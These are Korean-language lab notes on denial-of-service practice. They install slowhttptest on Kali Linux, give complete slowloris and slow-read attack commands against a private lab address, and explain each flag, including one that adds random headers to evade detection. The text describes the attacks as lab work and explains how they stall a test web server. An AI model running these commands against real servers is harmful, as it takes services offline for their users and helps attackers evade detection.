DDos slowloris, slow read dos 공격실습

 

kali linux에서

 

apt-get install slowhttptest

 

 

 

 

DDos slowloris

=====================

slowhttptest -H -c 2000 -i 1 -r 100 -x 3 -p 3 -u http://192.168.1.80

========================

 

 

DDos slow read dos

=================================

slowhttptest -X -c 1000 -r 200 -w 1 -y 1 -n 5 -z 1 -p 3 -u http://192.168.1.80

 

 

윈도우 사이즈도 1 버퍼사이즈도 1

window size 가 1로 바뀐다

=====================================

 

-H slow headers aka slowloris

-B R-U-Dead-Yet , RUDY 공격

-R Apache 취약점 공격

-X Slow Read 공격

 

-g 변화되는 소캣의 상태 통계 만든다. -o와 같이 사용

-o 보고서 출력

-c 타겟에 연결시도할 최대 세션숫자. 

-i 데이터간의 전송 간격

-r 초당 연결 수. 높게 설정할수록 가파르게 연결 세션이 올라간다.

-u 공격할  url

-x 탐지를 피하기 위한 random한 문자열을 X- 다음에 붙여준다. 

-p 몇초가 흐른 후에도 응답이 없으면 접속 불가능하다고 판단한다.

 

 

 

불안정한 get요청을 대기열에서 가지고있기떄문에

그 요청을 처리를 못하고있습니다.

그래서 메타스플로잇의 홈페이지를 접속을 하지못하게되는 원리입니다.